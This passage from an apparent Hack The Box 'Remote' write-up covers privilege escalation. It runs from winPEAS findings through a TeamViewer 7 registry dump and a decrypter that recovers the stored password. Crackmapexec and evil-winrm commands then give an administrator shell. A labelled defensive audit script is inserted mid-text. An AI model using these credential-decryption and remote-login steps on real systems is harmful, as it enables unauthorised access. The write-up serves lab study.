   [!] CVE-2019-1405 : VULNERABLE
    [>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/

  Finished. Found 9 potential vulnerabilities.
...
  [+] Looking for AutoLogon credentials
    Some AutoLogon credentials were found!!
    DefaultUserName               :  Administrator
...
  [+] Interesting Services -non Microsoft-
   [?] Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
    ssh-agent(OpenSSH Authentication Agent)[C:\Windows\System32\OpenSSH\ssh-agent.exe] - Disabled - Stopped
    Agent to hold private keys used for public key authentication.
   =================================================================================================

    TeamViewer7(TeamViewer GmbH - TeamViewer 7)["C:\Program Files (x86)\TeamViewer\Version7\TeamViewer_Service.exe"] - Auto - Running
    TeamViewer Remote Software
   =================================================================================================

    VGAuthService(VMware, Inc. - VMware Alias Manager and Ticket Service)["C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"] - Auto - Running
    Alias Manager and Ticket Service
   =================================================================================================

    VMTools(VMware, Inc. - VMware Tools)["C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"] - Auto - Running
    Provides support for synchronizing objects between the host and guest operating systems.
   =================================================================================================

    VMware Physical Disk Helper Service(VMware, Inc. - VMware Physical Disk Helper Service)["C:\Program Files\VMware\VMware Tools\vmacthlp.exe"] - Auto - Running
    Enables support for running virtual machines from a physical disk partition
   =================================================================================================

    VMwareCAFCommAmqpListener(VMware CAF AMQP Communication Service)["C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\CommAmqpListener.exe"] - Manual - Stopped
    VMware Common Agent AMQP Communication Service
   =================================================================================================

    VMwareCAFManagementAgentHost(VMware CAF Management Agent Service)["C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\ManagementAgentHost.exe"] - Manual - Stopped
    VMware Common Agent Management Agent Service
   =================================================================================================
...
Teamviewer
PS C:\Users\Public> ps

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    120       8     6428      10560       0.02   2168   0 conhost
    474      18     2332       5232              404   0 csrss
    162      13     1664       4476              488   1 csrss
    260      14     4084      13360             4204   0 dllhost
    531      21    14848      32812              560   1 dwm
     49       6     1592       3996              812   0 fontdrvhost
     49       6     1624       4076              976   1 fontdrvhost
      0       0       56          8                0   0 Idle
    198      16     8688      17296             2844   0 inetinfo
    472      26    11280      41912             5340   1 LogonUI
    929      23     5812      14324              648   0 lsass
    227      13     3052      10140             4432   0 msdtc
    601      65   119892     107172             3056   0 MsMpEng
    119      26     1940       5240             3224   0 nfssvc
    725      34    97168     112492       4.97   5764   0 powershell
      0      11      264      24360              104   0 Registry
    614      35    16852      20020             5292   0 SearchIndexer
    526      10     5228       9612              592   0 services
     53       3      516       1224              304   0 smss
    473      23     5876      16104             2720   0 spoolsv
    256      13     5068      11416               72   0 svchost
    226      12     2620      11972              132   0 svchost
...
    193      15     6148      10188             6092   0 svchost
   1477       0      192        140                4   0 System
   1007      23     5492      19184             2912   0 TeamViewer_Service
    178      12     3192      10032             2964   0 VGAuthService
    122       8     1564       6092             1420   0 vmacthlp
    300      20     4996      17980             2932   0 vmtoolsd
   1767     164   572532     417848   2,490.97   5108   0 w3wp
    163      14     4940      12096       0.03    112   0 win32calc
    175      11     1508       6560              480   0 wininit
    254      12     2840      13788              584   1 winlogon
    367      16     9332      18884             4792   0 WmiPrvSE
PS C:\Users\Public> tasklist /V /FI "PID eq 2912"

Image Name                     PID Session Name        Session#    Mem Usage Status          User Name                                              CPU Time Window Title
========================= ======== ================ =========== ============ =============== ================================================== ============ ===============
TeamViewer_Service.exe        2912                            0     22,588 K Unknown         N/A                                                     0:00:11 N/A
TeamViewer version 7 is old.
PS C:\Program Files (x86)\TeamViewer> dir

    Directory: C:\Program Files (x86)\TeamViewer

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/27/2020  10:35 AM                Version7
The whynotsecurity article explains that TeamViewer (up to version 14) stores its credentials in the Windows registry, encrypted with AES. By reverse engineering the client, whynotsecurity recovered the static key and initialization vector that TeamViewer uses, so the stored value can be decrypted by anyone able to read it.
PS C:\Program Files (x86)\TeamViewer\Version7> reg query HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7
    StartMenuGroup    REG_SZ    TeamViewer 7
    InstallationDate    REG_SZ    2020-02-20
    InstallationDirectory    REG_SZ    C:\Program Files (x86)\TeamViewer\Version7
    Always_Online    REG_DWORD    0x1
    Security_ActivateDirectIn    REG_DWORD    0x0
    Version    REG_SZ    7.0.43148
    ClientIC    REG_DWORD    0x11f[...]
    LastMACUsed    REG_MULTI_SZ    \0005056B9E820
    MIDInitiativeGUID    REG_SZ    {514ed376-a4ee-4507-a28b-484604ed0ba0}
    MIDVersion    REG_DWORD    0x1
    ClientID    REG_DWORD    0x6972e4aa
    CUse    REG_DWORD    0x1
    LastUpdateCheck    REG_DWORD    0x5e72893c
    UsageEnvironmentBackup    REG_DWORD    0x1
    SecurityPasswordAES    REG_BINARY    FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B
    MultiPwdMgmtIDs    REG_MULTI_SZ    admin
    MultiPwdMgmtPWDs    REG_MULTI_SZ    357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77
    Security_PasswordStrength    REG_DWORD    0x3

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7\AccessControl
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7\DefaultSettings
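The registry dump above is also what a defender would audit: an old TeamViewer build plus populated password values means the plaintext is one decryption away for anyone who can read the key. The script below is an added example (not part of the original write-up, and not a TeamViewer or whynotsecurity tool) that parses `reg query` output, reads the installed version, and lists which credential-holding values are present. The value names come from the decrypter prompt quoted later in the write-up (SecurityPasswordAES, OptionsPasswordAES, SecurityPasswordExported, PermanentPassword) plus MultiPwdMgmtPWDs from this dump; the "up to version 14" cut-off comes from the whynotsecurity article. SAMPLE_REG is trimmed from the write-up's output, and the Version15 block in it is constructed for contrast.

```python
r"""Audit a TeamViewer registry dump for stored credentials.

Added example, not part of the original write-up. It parses the text that
`reg query` prints for the TeamViewer\Version7 key, extracts the installed
version and reports which credential-holding values are present. Per the
whynotsecurity research, builds up to version 14 protect these values with a
static AES key, so a readable copy is as good as the plaintext password.
"""
import re

# Value names that hold an AES-protected password (names from the decrypter prompt
# in the write-up, plus MultiPwdMgmtPWDs as seen in this dump).
CREDENTIAL_VALUES = {
    "SecurityPasswordAES",
    "OptionsPasswordAES",
    "SecurityPasswordExported",
    "PermanentPassword",
    "MultiPwdMgmtPWDs",
}
LAST_AFFECTED_MAJOR = 14  # "up to version 14", per the whynotsecurity article

# Trimmed copy of the write-up's `reg query` output. The final TeamViewer key
# with Version 15.4.4445 is constructed for the example to show a clean result.
SAMPLE_REG = """\
HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\TeamViewer\\Version7
    InstallationDate    REG_SZ    2020-02-20
    Version    REG_SZ    7.0.43148
    ClientID    REG_DWORD    0x6972e4aa
    SecurityPasswordAES    REG_BINARY    FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B
    MultiPwdMgmtIDs    REG_MULTI_SZ    admin
    MultiPwdMgmtPWDs    REG_MULTI_SZ    357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77
    Security_PasswordStrength    REG_DWORD    0x3

HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\TeamViewer\\Version7\\AccessControl

HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\TeamViewer
    Version    REG_SZ    15.4.4445
"""

# reg query prints values indented: "<name>    <REG_TYPE>    <data>".
VALUE_RE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_[A-Z_]+)\s*(?P<data>.*)$")


def parse_reg_query(text):
    """Map each key path to a dict of {value name: (type, data)}."""
    keys, current = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():          # unindented line: a key path
            current = line.strip()
            keys[current] = {}
        else:
            m = VALUE_RE.match(line)
            if m and current is not None:
                keys[current][m.group("name")] = (m.group("type"), m.group("data").strip())
    return keys


def audit_teamviewer(keys):
    """One finding per key that carries a Version value: version, affected flag, stored credential values."""
    findings = []
    for path, values in keys.items():
        if "Version" not in values:
            continue
        version = values["Version"][1]
        try:
            major = int(version.split(".")[0])
        except ValueError:
            continue
        stored = sorted(name for name in values if name in CREDENTIAL_VALUES and values[name][1])
        findings.append({
            "key": path,
            "version": version,
            "affected": major <= LAST_AFFECTED_MAJOR,
            "credential_values": stored,
        })
    return findings


if __name__ == "__main__":
    for f in audit_teamviewer(parse_reg_query(SAMPLE_REG)):
        state = "AFFECTED" if f["affected"] else "ok"
        print(f"{f['key']}: version {f['version']} [{state}] stored: {f['credential_values'] or 'none'}")
```

Feed it the saved output of `reg query` for the TeamViewer keys; a finding that is both affected and has non-empty credential values is the condition to remediate (clear the stored password or move the client past version 14).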
Using the
u505@naos:~/HTB/Machines/Remote$ python3 /opt/utils/teamviewer_password_decrypt/teamviewer_password_decrypt.py
This is a quick and dirty Teamviewer password decrypter basis wonderful post by @whynotsecurity. Read this blogpost if you haven't already : https://whynotsecurity.com/blog/teamviewer
Please check below mentioned registry values and enter its value manually without spaces. "SecurityPasswordAES" OR "OptionsPasswordAES" OR "SecurityPasswordExported" OR "PermanentPassword"
Enter output from registry without spaces : FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B
Decrypted password is : !R3m0te!
Check credentials
u505@naos:~/HTB/Machines/Remote$ crackmapexec smb 10.10.10.180/32 -u administrator -p '!R3m0te!'
SMB 10.10.10.180 445 REMOTE [*] Windows 10.0 Build 17763 x64 (name:REMOTE) (domain:remote) (signing:False) (SMBv1:False)
SMB 10.10.10.180 445 REMOTE [+] remote\administrator:!R3m0te! (Pwn3d!)
Root flag
With administrator, we can use psexec or evil-winrm to gain a shell.
u505@naos:~/HTB/Machines/Remote$ evil-winrm -i 10.10.10.180 -u administrator -p '!R3m0te!'

Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
Directory: C:\Users\Administrator\Documents
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/19/2020   4:26 PM                SQL Server Management Studio
d-----        2/20/2020  12:05 AM                Visual Studio 2017

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       12/30/2020   4:55 PM             34 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
<ROOT_FLAG>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> exit
Info: Exiting with code 0
References
- Where does Umbraco store usernames and passwords?
- https://fileinfo.com/extension/sdf
- Umbraco RCE exploit / PoC
- Umbraco RCE PowerShell Reverse Shell PoC
- https://whynotsecurity.com/blog/teamviewer/
- This is a quick and dirty Teamviewer password decrypter basis wonderful post by @whynotsecurity
- https://community.teamviewer.com/English/kb/articles/16835-how-to-uninstall-teamviewer-on-pc
Daniel Simao 08:14, 31 December 2020 (EST)